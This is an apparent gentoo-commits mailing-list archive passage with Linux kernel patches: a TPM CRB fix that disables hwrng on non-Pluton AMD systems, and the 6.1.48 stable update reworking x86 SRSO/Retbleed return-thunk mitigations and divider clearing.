+	Mario Limonciello <mario.limonciello@amd.com>,
+	linux-kernel@vger.kernel.org
+Subject: [PATCH v3] tpm: Enable hwrng only for Pluton on AMD CPUs
+Date: Wed, 23 Aug 2023 02:15:10 +0300	[thread overview]
+Message-ID: <20230822231510.2263255-1-jarkko@kernel.org> (raw)
+
+The vendor check introduced by commit 554b841d4703 ("tpm: Disable RNG for
+all AMD fTPMs") doesn't work properly on a number of Intel fTPMs.  On the
+reported systems the TPM doesn't reply at bootup and returns back the
+command code. This makes the TPM fail probe.
+
+Since only Microsoft Pluton is the only known combination of AMD CPU and
+fTPM from other vendor, disable hwrng otherwise. In order to make sysadmin
+aware of this, print also info message to the klog.
+
+Cc: stable@vger.kernel.org
+Fixes: 554b841d4703 ("tpm: Disable RNG for all AMD fTPMs")
+Reported-by: Todd Brandt <todd.e.brandt@intel.com>
+Closes: https://bugzilla.kernel.org/show_bug.cgi?id=217804
+Signed-off-by: Jarkko Sakkinen <jarkko@kernel.org>
+---
+v3:
+* Forgot to amend config flags.
+v2:
+* CONFIG_X86
+* Removed "Reviewed-by: Jarkko Sakkinen <jarkko@kernel.org>"
+* Removed "Signed-off-by: Mario Limonciello <mario.limonciello@amd.com>"
+---
+ drivers/char/tpm/tpm_crb.c | 33 ++++++++-------------------------
+ 1 file changed, 8 insertions(+), 25 deletions(-)
+
+diff --git a/drivers/char/tpm/tpm_crb.c b/drivers/char/tpm/tpm_crb.c
+index 65ff4d2fbe8d..ea085b14ab7c 100644
+--- a/drivers/char/tpm/tpm_crb.c
++++ b/drivers/char/tpm/tpm_crb.c
+@@ -463,28 +463,6 @@ static bool crb_req_canceled(struct tpm_chip *chip, u8 status)
+ 	return (cancel & CRB_CANCEL_INVOKE) == CRB_CANCEL_INVOKE;
+ }
+ 
+-static int crb_check_flags(struct tpm_chip *chip)
+-{
+-	u32 val;
+-	int ret;
+-
+-	ret = crb_request_locality(chip, 0);
+-	if (ret)
+-		return ret;
+-
+-	ret = tpm2_get_tpm_pt(chip, TPM2_PT_MANUFACTURER, &val, NULL);
+-	if (ret)
+-		goto release;
+-
+-	if (val == 0x414D4400U /* AMD */)
+-		chip->flags |= TPM_CHIP_FLAG_HWRNG_DISABLED;
+-
+-release:
+-	crb_relinquish_locality(chip, 0);
+-
+-	return ret;
+-}
+-
+ static const struct tpm_class_ops tpm_crb = {
+ 	.flags = TPM_OPS_AUTO_STARTUP,
+ 	.status = crb_status,
+@@ -827,9 +805,14 @@ static int crb_acpi_add(struct acpi_device *device)
+ 	if (rc)
+ 		goto out;
+ 
+-	rc = crb_check_flags(chip);
+-	if (rc)
+-		goto out;
++#ifdef CONFIG_X86
++	/* A quirk for https://www.amd.com/en/support/kb/faq/pa-410 */
++	if (boot_cpu_data.x86_vendor == X86_VENDOR_AMD &&
++	    priv->sm != ACPI_TPM2_COMMAND_BUFFER_WITH_PLUTON) {
++		dev_info(dev, "Disabling hwrng\n");
++		chip->flags |= TPM_CHIP_FLAG_HWRNG_DISABLED;
++	}
++#endif /* CONFIG_X86 */
+ 
+ 	rc = tpm_chip_register(chip);
+ 
+-- 
+2.39.2


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-08-26 15:00 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-08-26 15:00 UTC (permalink / raw
  To: gentoo-commits

commit:     597ad722c61ee3671b7cd0dcefa8ce523a757ed3
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Aug 26 15:00:24 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Aug 26 15:00:24 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=597ad722

Linux patch 6.1.48

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |   4 +
 1047_linux-6.1.48.patch | 604 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 608 insertions(+)

diff --git a/0000_README b/0000_README
index 0ad2cca2..40eb5947 100644
--- a/0000_README
+++ b/0000_README
@@ -231,6 +231,10 @@ Patch:  1046_linux-6.1.47.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.47
 
+Patch:  1047_linux-6.1.48.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.48
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1047_linux-6.1.48.patch b/1047_linux-6.1.48.patch
new file mode 100644
index 00000000..eb7ca312
--- /dev/null
+++ b/1047_linux-6.1.48.patch
@@ -0,0 +1,604 @@
+diff --git a/Documentation/admin-guide/hw-vuln/srso.rst b/Documentation/admin-guide/hw-vuln/srso.rst
+index 2f923c805802f..f79cb11b080f6 100644
+--- a/Documentation/admin-guide/hw-vuln/srso.rst
++++ b/Documentation/admin-guide/hw-vuln/srso.rst
+@@ -124,8 +124,8 @@ sequence.
+ To ensure the safety of this mitigation, the kernel must ensure that the
+ safe return sequence is itself free from attacker interference.  In Zen3
+ and Zen4, this is accomplished by creating a BTB alias between the
+-untraining function srso_untrain_ret_alias() and the safe return
+-function srso_safe_ret_alias() which results in evicting a potentially
++untraining function srso_alias_untrain_ret() and the safe return
++function srso_alias_safe_ret() which results in evicting a potentially
+ poisoned BTB entry and using that safe one for all function returns.
+ 
+ In older Zen1 and Zen2, this is accomplished using a reinterpretation
+diff --git a/Makefile b/Makefile
+index 375efcfb91f8f..8bb8dd199c552 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 47
++SUBLEVEL = 48
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/x86/include/asm/entry-common.h b/arch/x86/include/asm/entry-common.h
+index 674ed46d3ceda..11203a9fe0a87 100644
+--- a/arch/x86/include/asm/entry-common.h
++++ b/arch/x86/include/asm/entry-common.h
+@@ -92,6 +92,7 @@ static inline void arch_exit_to_user_mode_prepare(struct pt_regs *regs,
+ static __always_inline void arch_exit_to_user_mode(void)
+ {
+ 	mds_user_clear_cpu_buffers();
++	amd_clear_divider();
+ }
+ #define arch_exit_to_user_mode arch_exit_to_user_mode
+ 
+diff --git a/arch/x86/include/asm/nospec-branch.h b/arch/x86/include/asm/nospec-branch.h
+index 31fa631c8587c..2f123d4fb85b5 100644
+--- a/arch/x86/include/asm/nospec-branch.h
++++ b/arch/x86/include/asm/nospec-branch.h
+@@ -168,9 +168,9 @@
+ .endm
+ 
+ #ifdef CONFIG_CPU_UNRET_ENTRY
+-#define CALL_ZEN_UNTRAIN_RET	"call zen_untrain_ret"
++#define CALL_UNTRAIN_RET	"call entry_untrain_ret"
+ #else
+-#define CALL_ZEN_UNTRAIN_RET	""
++#define CALL_UNTRAIN_RET	""
+ #endif
+ 
+ /*
+@@ -178,7 +178,7 @@
+  * return thunk isn't mapped into the userspace tables (then again, AMD
+  * typically has NO_MELTDOWN).
+  *
+- * While zen_untrain_ret() doesn't clobber anything but requires stack,
++ * While retbleed_untrain_ret() doesn't clobber anything but requires stack,
+  * entry_ibpb() will clobber AX, CX, DX.
+  *
+  * As such, this must be placed after every *SWITCH_TO_KERNEL_CR3 at a point
+@@ -189,14 +189,9 @@
+ 	defined(CONFIG_CPU_SRSO)
+ 	ANNOTATE_UNRET_END
+ 	ALTERNATIVE_2 "",						\
+-	              CALL_ZEN_UNTRAIN_RET, X86_FEATURE_UNRET,		\
++		      CALL_UNTRAIN_RET, X86_FEATURE_UNRET,		\
+ 		      "call entry_ibpb", X86_FEATURE_ENTRY_IBPB
+ #endif
+-
+-#ifdef CONFIG_CPU_SRSO
+-	ALTERNATIVE_2 "", "call srso_untrain_ret", X86_FEATURE_SRSO, \
+-			  "call srso_untrain_ret_alias", X86_FEATURE_SRSO_ALIAS
+-#endif
+ .endm
+ 
+ #else /* __ASSEMBLY__ */
+@@ -210,10 +205,21 @@
+ typedef u8 retpoline_thunk_t[RETPOLINE_THUNK_SIZE];
+ extern retpoline_thunk_t __x86_indirect_thunk_array[];
+ 
++#ifdef CONFIG_RETHUNK
+ extern void __x86_return_thunk(void);
+-extern void zen_untrain_ret(void);
++#else
++static inline void __x86_return_thunk(void) {}
++#endif
++
++extern void retbleed_return_thunk(void);
++extern void srso_return_thunk(void);
++extern void srso_alias_return_thunk(void);
++
++extern void retbleed_untrain_ret(void);
+ extern void srso_untrain_ret(void);
+-extern void srso_untrain_ret_alias(void);
++extern void srso_alias_untrain_ret(void);
++
++extern void entry_untrain_ret(void);
+ extern void entry_ibpb(void);
+ 
+ #ifdef CONFIG_RETPOLINE
+diff --git a/arch/x86/kernel/cpu/amd.c b/arch/x86/kernel/cpu/amd.c
+index 239b302973d7a..f240c978d85e4 100644
+--- a/arch/x86/kernel/cpu/amd.c
++++ b/arch/x86/kernel/cpu/amd.c
+@@ -1295,3 +1295,4 @@ void noinstr amd_clear_divider(void)
+ 	asm volatile(ALTERNATIVE("", "div %2\n\t", X86_BUG_DIV0)
+ 		     :: "a" (0), "d" (0), "r" (1));
+ }
++EXPORT_SYMBOL_GPL(amd_clear_divider);
+diff --git a/arch/x86/kernel/cpu/bugs.c b/arch/x86/kernel/cpu/bugs.c
+index d98f33ea57e47..3a893ab398a01 100644
+--- a/arch/x86/kernel/cpu/bugs.c
++++ b/arch/x86/kernel/cpu/bugs.c
+@@ -62,6 +62,8 @@ EXPORT_SYMBOL_GPL(x86_pred_cmd);
+ 
+ static DEFINE_MUTEX(spec_ctrl_mutex);
+ 
++void (*x86_return_thunk)(void) __ro_after_init = &__x86_return_thunk;
++
+ /* Update SPEC_CTRL MSR and its cached copy unconditionally */
+ static void update_spec_ctrl(u64 val)
+ {
+@@ -164,8 +166,13 @@ void __init cpu_select_mitigations(void)
+ 	md_clear_select_mitigation();
+ 	srbds_select_mitigation();
+ 	l1d_flush_select_mitigation();
+-	gds_select_mitigation();
++
++	/*
++	 * srso_select_mitigation() depends and must run after
++	 * retbleed_select_mitigation().
++	 */
+ 	srso_select_mitigation();
++	gds_select_mitigation();
+ }
+ 
+ /*
+@@ -1013,6 +1020,9 @@ do_cmd_auto:
+ 		setup_force_cpu_cap(X86_FEATURE_RETHUNK);
+ 		setup_force_cpu_cap(X86_FEATURE_UNRET);
+ 
++		if (IS_ENABLED(CONFIG_RETHUNK))
++			x86_return_thunk = retbleed_return_thunk;
++
+ 		if (boot_cpu_data.x86_vendor != X86_VENDOR_AMD &&
+ 		    boot_cpu_data.x86_vendor != X86_VENDOR_HYGON)
+ 			pr_err(RETBLEED_UNTRAIN_MSG);
+@@ -2388,9 +2398,10 @@ static void __init srso_select_mitigation(void)
+ 		 * Zen1/2 with SMT off aren't vulnerable after the right
+ 		 * IBPB microcode has been applied.
+ 		 */
+-		if ((boot_cpu_data.x86 < 0x19) &&
+-		    (!cpu_smt_possible() || (cpu_smt_control == CPU_SMT_DISABLED)))
++		if (boot_cpu_data.x86 < 0x19 && !cpu_smt_possible()) {
+ 			setup_force_cpu_cap(X86_FEATURE_SRSO_NO);
++			return;
++		}
+ 	}
+ 
+ 	if (retbleed_mitigation == RETBLEED_MITIGATION_IBPB) {
+@@ -2419,11 +2430,15 @@ static void __init srso_select_mitigation(void)
+ 			 * like ftrace, static_call, etc.
+ 			 */
+ 			setup_force_cpu_cap(X86_FEATURE_RETHUNK);
++			setup_force_cpu_cap(X86_FEATURE_UNRET);
+ 
+-			if (boot_cpu_data.x86 == 0x19)
++			if (boot_cpu_data.x86 == 0x19) {
+ 				setup_force_cpu_cap(X86_FEATURE_SRSO_ALIAS);
+-			else
++				x86_return_thunk = srso_alias_return_thunk;
++			} else {
+ 				setup_force_cpu_cap(X86_FEATURE_SRSO);
++				x86_return_thunk = srso_return_thunk;
++			}
+ 			srso_mitigation = SRSO_MITIGATION_SAFE_RET;
+ 		} else {
+ 			pr_err("WARNING: kernel not compiled with CPU_SRSO.\n");
+@@ -2672,6 +2687,9 @@ static ssize_t gds_show_state(char *buf)
+ 
+ static ssize_t srso_show_state(char *buf)
+ {
++	if (boot_cpu_has(X86_FEATURE_SRSO_NO))
++		return sysfs_emit(buf, "Mitigation: SMT disabled\n");
++
+ 	return sysfs_emit(buf, "%s%s\n",
+ 			  srso_strings[srso_mitigation],
+ 			  (cpu_has_ibpb_brtype_microcode() ? "" : ", no microcode"));
+diff --git a/arch/x86/kernel/static_call.c b/arch/x86/kernel/static_call.c
+index a9b54b795ebff..3fbb491688275 100644
+--- a/arch/x86/kernel/static_call.c
++++ b/arch/x86/kernel/static_call.c
+@@ -184,6 +184,19 @@ EXPORT_SYMBOL_GPL(arch_static_call_transform);
+  */
+ bool __static_call_fixup(void *tramp, u8 op, void *dest)
+ {
++	unsigned long addr = (unsigned long)tramp;
++	/*
++	 * Not all .return_sites are a static_call trampoline (most are not).
++	 * Check if the 3 bytes after the return are still kernel text, if not,
++	 * then this definitely is not a trampoline and we need not worry
++	 * further.
++	 *
++	 * This avoids the memcmp() below tripping over pagefaults etc..
++	 */
++	if (((addr >> PAGE_SHIFT) != ((addr + 7) >> PAGE_SHIFT)) &&
++	    !kernel_text_address(addr + 7))
++		return false;
++
+ 	if (memcmp(tramp+5, tramp_ud, 3)) {
+ 		/* Not a trampoline site, not our problem. */
+ 		return false;
+diff --git a/arch/x86/kernel/traps.c b/arch/x86/kernel/traps.c
+index 7e8795d8b0f17..c0a5a4f225d9a 100644
+--- a/arch/x86/kernel/traps.c
++++ b/arch/x86/kernel/traps.c
+@@ -206,8 +206,6 @@ DEFINE_IDTENTRY(exc_divide_error)
+ {
+ 	do_error_trap(regs, 0, "divide error", X86_TRAP_DE, SIGFPE,
+ 		      FPE_INTDIV, error_get_trap_addr(regs));
+-
+-	amd_clear_divider();
+ }
+ 
+ DEFINE_IDTENTRY(exc_overflow)
+diff --git a/arch/x86/kernel/vmlinux.lds.S b/arch/x86/kernel/vmlinux.lds.S
+index e6939ebb606ab..78ccb5ec3c0e7 100644
+--- a/arch/x86/kernel/vmlinux.lds.S
++++ b/arch/x86/kernel/vmlinux.lds.S
+@@ -134,18 +134,18 @@ SECTIONS
+ 		KPROBES_TEXT
+ 		ALIGN_ENTRY_TEXT_BEGIN
+ #ifdef CONFIG_CPU_SRSO
+-		*(.text.__x86.rethunk_untrain)
++		*(.text..__x86.rethunk_untrain)
+ #endif
+ 
+ 		ENTRY_TEXT
+ 
+ #ifdef CONFIG_CPU_SRSO
+ 		/*
+-		 * See the comment above srso_untrain_ret_alias()'s
++		 * See the comment above srso_alias_untrain_ret()'s
+ 		 * definition.
+ 		 */
+-		. = srso_untrain_ret_alias | (1 << 2) | (1 << 8) | (1 << 14) | (1 << 20);
+-		*(.text.__x86.rethunk_safe)
++		. = srso_alias_untrain_ret | (1 << 2) | (1 << 8) | (1 << 14) | (1 << 20);
++		*(.text..__x86.rethunk_safe)
+ #endif
+ 		ALIGN_ENTRY_TEXT_END
+ 		SOFTIRQENTRY_TEXT
+@@ -154,8 +154,8 @@ SECTIONS
+ 
+ #ifdef CONFIG_RETPOLINE
+ 		__indirect_thunk_start = .;
+-		*(.text.__x86.indirect_thunk)
+-		*(.text.__x86.return_thunk)
++		*(.text..__x86.indirect_thunk)
++		*(.text..__x86.return_thunk)
+ 		__indirect_thunk_end = .;
+ #endif
+ 	} :text =0xcccc
+@@ -507,8 +507,8 @@ INIT_PER_CPU(irq_stack_backing_store);
+            "fixed_percpu_data is not at start of per-cpu area");
+ #endif
+ 
+- #ifdef CONFIG_RETHUNK
+-. = ASSERT((__ret & 0x3f) == 0, "__ret not cacheline-aligned");
++#ifdef CONFIG_RETHUNK
++. = ASSERT((retbleed_return_thunk & 0x3f) == 0, "retbleed_return_thunk not cacheline-aligned");
+ . = ASSERT((srso_safe_ret & 0x3f) == 0, "srso_safe_ret not cacheline-aligned");
+ #endif
+ 
+@@ -523,8 +523,8 @@ INIT_PER_CPU(irq_stack_backing_store);
+  * Instead do: (A | B) - (A & B) in order to compute the XOR
+  * of the two function addresses:
+  */
+-. = ASSERT(((ABSOLUTE(srso_untrain_ret_alias) | srso_safe_ret_alias) -
+-		(ABSOLUTE(srso_untrain_ret_alias) & srso_safe_ret_alias)) == ((1 << 2) | (1 << 8) | (1 << 14) | (1 << 20)),
++. = ASSERT(((ABSOLUTE(srso_alias_untrain_ret) | srso_alias_safe_ret) -
++		(ABSOLUTE(srso_alias_untrain_ret) & srso_alias_safe_ret)) == ((1 << 2) | (1 << 8) | (1 << 14) | (1 << 20)),
+ 		"SRSO function pair won't alias");
+ #endif
+ 
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index fdb6007f2eb86..a96f9a17e8b5d 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -3947,6 +3947,8 @@ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu, bool spec_ctrl_in
+ 
+ 	guest_state_enter_irqoff();
+ 
++	amd_clear_divider();
++
+ 	if (sev_es_guest(vcpu->kvm))
+ 		__svm_sev_es_vcpu_run(svm, spec_ctrl_intercepted);
+ 	else
+diff --git a/arch/x86/lib/retpoline.S b/arch/x86/lib/retpoline.S
+index 30e76fab678a5..65c5c44f006bc 100644
+--- a/arch/x86/lib/retpoline.S
++++ b/arch/x86/lib/retpoline.S
+@@ -11,7 +11,7 @@
+ #include <asm/frame.h>
+ #include <asm/nops.h>
+ 
+-	.section .text.__x86.indirect_thunk
++	.section .text..__x86.indirect_thunk
+ 
+ .macro RETPOLINE reg
+ 	ANNOTATE_INTRA_FUNCTION_CALL
+@@ -76,75 +76,106 @@ SYM_CODE_END(__x86_indirect_thunk_array)
+ #ifdef CONFIG_RETHUNK
+ 
+ /*
+- * srso_untrain_ret_alias() and srso_safe_ret_alias() are placed at
++ * srso_alias_untrain_ret() and srso_alias_safe_ret() are placed at
+  * special addresses:
+  *
+- * - srso_untrain_ret_alias() is 2M aligned
+- * - srso_safe_ret_alias() is also in the same 2M page but bits 2, 8, 14
++ * - srso_alias_untrain_ret() is 2M aligned
++ * - srso_alias_safe_ret() is also in the same 2M page but bits 2, 8, 14
+  * and 20 in its virtual address are set (while those bits in the
+- * srso_untrain_ret_alias() function are cleared).
++ * srso_alias_untrain_ret() function are cleared).
+  *
+  * This guarantees that those two addresses will alias in the branch
+  * target buffer of Zen3/4 generations, leading to any potential
+  * poisoned entries at that BTB slot to get evicted.
+  *
+- * As a result, srso_safe_ret_alias() becomes a safe return.
++ * As a result, srso_alias_safe_ret() becomes a safe return.
+  */
+ #ifdef CONFIG_CPU_SRSO
+-	.section .text.__x86.rethunk_untrain
++	.section .text..__x86.rethunk_untrain
+ 
+-SYM_START(srso_untrain_ret_alias, SYM_L_GLOBAL, SYM_A_NONE)
++SYM_START(srso_alias_untrain_ret, SYM_L_GLOBAL, SYM_A_NONE)
++	UNWIND_HINT_FUNC
+ 	ANNOTATE_NOENDBR
+ 	ASM_NOP2
+ 	lfence
+-	jmp __x86_return_thunk
+-SYM_FUNC_END(srso_untrain_ret_alias)
+-__EXPORT_THUNK(srso_untrain_ret_alias)
++	jmp srso_alias_return_thunk
++SYM_FUNC_END(srso_alias_untrain_ret)
++__EXPORT_THUNK(srso_alias_untrain_ret)
+ 
+-	.section .text.__x86.rethunk_safe
++	.section .text..__x86.rethunk_safe
++#else
++/* dummy definition for alternatives */
++SYM_START(srso_alias_untrain_ret, SYM_L_GLOBAL, SYM_A_NONE)
++	ANNOTATE_UNRET_SAFE
++	ret
++	int3
++SYM_FUNC_END(srso_alias_untrain_ret)
+ #endif
+ 
+-/* Needs a definition for the __x86_return_thunk alternative below. */
+-SYM_START(srso_safe_ret_alias, SYM_L_GLOBAL, SYM_A_NONE)
+-#ifdef CONFIG_CPU_SRSO
+-	add $8, %_ASM_SP
++SYM_START(srso_alias_safe_ret, SYM_L_GLOBAL, SYM_A_NONE)
++	lea 8(%_ASM_SP), %_ASM_SP
+ 	UNWIND_HINT_FUNC
+-#endif
+ 	ANNOTATE_UNRET_SAFE
+ 	ret
+ 	int3
+-SYM_FUNC_END(srso_safe_ret_alias)
++SYM_FUNC_END(srso_alias_safe_ret)
++
++	.section .text..__x86.return_thunk
+ 
+-	.section .text.__x86.return_thunk
++SYM_CODE_START(srso_alias_return_thunk)
++	UNWIND_HINT_FUNC
++	ANNOTATE_NOENDBR
++	call srso_alias_safe_ret
++	ud2
++SYM_CODE_END(srso_alias_return_thunk)
++
++/*
++ * Some generic notes on the untraining sequences:
++ *
++ * They are interchangeable when it comes to flushing potentially wrong
++ * RET predictions from the BTB.
++ *
++ * The SRSO Zen1/2 (MOVABS) untraining sequence is longer than the
++ * Retbleed sequence because the return sequence done there
++ * (srso_safe_ret()) is longer and the return sequence must fully nest
++ * (end before) the untraining sequence. Therefore, the untraining
++ * sequence must fully overlap the return sequence.
++ *
++ * Regarding alignment - the instructions which need to be untrained,
++ * must all start at a cacheline boundary for Zen1/2 generations. That
++ * is, instruction sequences starting at srso_safe_ret() and
++ * the respective instruction sequences at retbleed_return_thunk()
++ * must start at a cacheline boundary.
++ */
+ 
+ /*
+  * Safety details here pertain to the AMD Zen{1,2} microarchitecture:
+- * 1) The RET at __x86_return_thunk must be on a 64 byte boundary, for
++ * 1) The RET at retbleed_return_thunk must be on a 64 byte boundary, for
+  *    alignment within the BTB.
+- * 2) The instruction at zen_untrain_ret must contain, and not
++ * 2) The instruction at retbleed_untrain_ret must contain, and not
+  *    end with, the 0xc3 byte of the RET.
+  * 3) STIBP must be enabled, or SMT disabled, to prevent the sibling thread
+  *    from re-poisioning the BTB prediction.
+  */
+ 	.align 64
+-	.skip 64 - (__ret - zen_untrain_ret), 0xcc
+-SYM_START(zen_untrain_ret, SYM_L_GLOBAL, SYM_A_NONE)
++	.skip 64 - (retbleed_return_thunk - retbleed_untrain_ret), 0xcc
++SYM_START(retbleed_untrain_ret, SYM_L_GLOBAL, SYM_A_NONE)
+ 	ANNOTATE_NOENDBR
+ 	/*
+-	 * As executed from zen_untrain_ret, this is:
++	 * As executed from retbleed_untrain_ret, this is:
+ 	 *
+ 	 *   TEST $0xcc, %bl
+ 	 *   LFENCE
+-	 *   JMP __x86_return_thunk
++	 *   JMP retbleed_return_thunk
+ 	 *
+ 	 * Executing the TEST instruction has a side effect of evicting any BTB
+ 	 * prediction (potentially attacker controlled) attached to the RET, as
+-	 * __x86_return_thunk + 1 isn't an instruction boundary at the moment.
++	 * retbleed_return_thunk + 1 isn't an instruction boundary at the moment.
+ 	 */
+ 	.byte	0xf6
+ 
+ 	/*
+-	 * As executed from __x86_return_thunk, this is a plain RET.
++	 * As executed from retbleed_return_thunk, this is a plain RET.
+ 	 *
+ 	 * As part of the TEST above, RET is the ModRM byte, and INT3 the imm8.
+ 	 *
+@@ -156,13 +187,13 @@ SYM_START(zen_untrain_ret, SYM_L_GLOBAL, SYM_A_NONE)
+ 	 * With SMT enabled and STIBP active, a sibling thread cannot poison
+ 	 * RET's prediction to a type of its choice, but can evict the
+ 	 * prediction due to competitive sharing. If the prediction is
+-	 * evicted, __x86_return_thunk will suffer Straight Line Speculation
++	 * evicted, retbleed_return_thunk will suffer Straight Line Speculation
+ 	 * which will be contained safely by the INT3.
+ 	 */
+-SYM_INNER_LABEL(__ret, SYM_L_GLOBAL)
++SYM_INNER_LABEL(retbleed_return_thunk, SYM_L_GLOBAL)
+ 	ret
+ 	int3
+-SYM_CODE_END(__ret)
++SYM_CODE_END(retbleed_return_thunk)
+ 
+ 	/*
+ 	 * Ensure the TEST decoding / BTB invalidation is complete.
+@@ -173,16 +204,16 @@ SYM_CODE_END(__ret)
+ 	 * Jump back and execute the RET in the middle of the TEST instruction.
+ 	 * INT3 is for SLS protection.
+ 	 */
+-	jmp __ret
++	jmp retbleed_return_thunk
+ 	int3
+-SYM_FUNC_END(zen_untrain_ret)
+-__EXPORT_THUNK(zen_untrain_ret)
++SYM_FUNC_END(retbleed_untrain_ret)
++__EXPORT_THUNK(retbleed_untrain_ret)
+ 
+ /*
+- * SRSO untraining sequence for Zen1/2, similar to zen_untrain_ret()
++ * SRSO untraining sequence for Zen1/2, similar to retbleed_untrain_ret()
+  * above. On kernel entry, srso_untrain_ret() is executed which is a
+  *
+- * movabs $0xccccccc308c48348,%rax
++ * movabs $0xccccc30824648d48,%rax
+  *
+  * and when the return thunk executes the inner label srso_safe_ret()
+  * later, it is a stack manipulation and a RET which is mispredicted and
+@@ -194,22 +225,44 @@ SYM_START(srso_untrain_ret, SYM_L_GLOBAL, SYM_A_NONE)
+ 	ANNOTATE_NOENDBR
+ 	.byte 0x48, 0xb8
+ 
++/*
++ * This forces the function return instruction to speculate into a trap
++ * (UD2 in srso_return_thunk() below).  This RET will then mispredict
++ * and execution will continue at the return site read from the top of
++ * the stack.
++ */
+ SYM_INNER_LABEL(srso_safe_ret, SYM_L_GLOBAL)
+-	add $8, %_ASM_SP
++	lea 8(%_ASM_SP), %_ASM_SP
+ 	ret
+ 	int3
+ 	int3
+-	int3
++	/* end of movabs */
+ 	lfence
+ 	call srso_safe_ret
+-	int3
++	ud2
+ SYM_CODE_END(srso_safe_ret)
+ SYM_FUNC_END(srso_untrain_ret)
+ __EXPORT_THUNK(srso_untrain_ret)
+ 
+-SYM_FUNC_START(__x86_return_thunk)
+-	ALTERNATIVE_2 "jmp __ret", "call srso_safe_ret", X86_FEATURE_SRSO, \
+-			"call srso_safe_ret_alias", X86_FEATURE_SRSO_ALIAS
++SYM_CODE_START(srso_return_thunk)
++	UNWIND_HINT_FUNC
++	ANNOTATE_NOENDBR
++	call srso_safe_ret
++	ud2
++SYM_CODE_END(srso_return_thunk)
++
++SYM_FUNC_START(entry_untrain_ret)
++	ALTERNATIVE_2 "jmp retbleed_untrain_ret", \
++		      "jmp srso_untrain_ret", X86_FEATURE_SRSO, \
++		      "jmp srso_alias_untrain_ret", X86_FEATURE_SRSO_ALIAS
++SYM_FUNC_END(entry_untrain_ret)
++__EXPORT_THUNK(entry_untrain_ret)
++
++SYM_CODE_START(__x86_return_thunk)
++	UNWIND_HINT_FUNC
++	ANNOTATE_NOENDBR
++	ANNOTATE_UNRET_SAFE
++	ret
+ 	int3
+ SYM_CODE_END(__x86_return_thunk)
+ EXPORT_SYMBOL(__x86_return_thunk)
+diff --git a/tools/objtool/arch/x86/decode.c b/tools/objtool/arch/x86/decode.c
+index a60c5efe34b36..29c35279c7ed8 100644
+--- a/tools/objtool/arch/x86/decode.c
++++ b/tools/objtool/arch/x86/decode.c
+@@ -799,5 +799,5 @@ bool arch_is_rethunk(struct symbol *sym)
+ 	return !strcmp(sym->name, "__x86_return_thunk") ||
+ 	       !strcmp(sym->name, "srso_untrain_ret") ||
+ 	       !strcmp(sym->name, "srso_safe_ret") ||
+-	       !strcmp(sym->name, "__ret");
++	       !strcmp(sym->name, "retbleed_return_thunk");
+ }
+diff --git a/tools/objtool/check.c b/tools/objtool/check.c
+index c2c350933a237..913bd361c3684 100644
+--- a/tools/objtool/check.c
++++ b/tools/objtool/check.c
+@@ -379,7 +379,7 @@ static int decode_instructions(struct objtool_file *file)
+ 
+ 		if (!strcmp(sec->name, ".noinstr.text") ||
+ 		    !strcmp(sec->name, ".entry.text") ||
+-		    !strncmp(sec->name, ".text.__x86.", 12))
++		    !strncmp(sec->name, ".text..__x86.", 13))
+ 			sec->noinstr = true;
+ 
+ 		for (offset = 0; offset < sec->sh.sh_size; offset += insn->len) {
+@@ -1430,7 +1430,7 @@ static int add_jump_destinations(struct objtool_file *file)
+ 			struct symbol *sym = find_symbol_by_offset(dest_sec, dest_off);
+ 
+ 			/*
+-			 * This is a special case for zen_untrain_ret().
++			 * This is a special case for retbleed_untrain_ret().
+ 			 * It jumps to __x86_return_thunk(), but objtool
+ 			 * can't find the thunk's starting RET
+ 			 * instruction, because the RET is also in the
+@@ -2450,12 +2450,17 @@ static int decode_sections(struct objtool_file *file)
+ 	return 0;
+ }
+ 
+-static bool is_fentry_call(struct instruction *insn)
++static bool is_special_call(struct instruction *insn)
+ {
+-	if (insn->type == INSN_CALL &&
+-	    insn->call_dest &&
+-	    insn->call_dest->fentry)
+-		return true;
++	if (insn->type == INSN_CALL) {
++		struct symbol *dest = insn->call_dest;
++
++		if (!dest)
++			return false;
++
++		if (dest->fentry)
++			return true;
++	}
+ 
+ 	return false;
+ }
+@@ -3448,7 +3453,7 @@ static int validate_branch(struct objtool_file *file, struct symbol *func,
+ 			if (ret)
+ 				return ret;
+ 
+-			if (opts.stackval && func && !is_fentry_call(insn) &&
++			if (opts.stackval && func && !is_special_call(insn) &&
+ 			    !has_valid_stack_frame(&state)) {
+ 				WARN_FUNC("call without frame pointer save/setup",
+ 					  sec, insn->offset);


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-08-23 18:08 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-08-23 18:08 UTC (permalink / raw
  To: gentoo-commits

commit:     ebb4944c0658d818673b757eea7c32d00ad5523e
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Aug 23 18:08:43 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Aug 23 18:08:43 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=ebb4944c

Linux patch 6.1.47

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

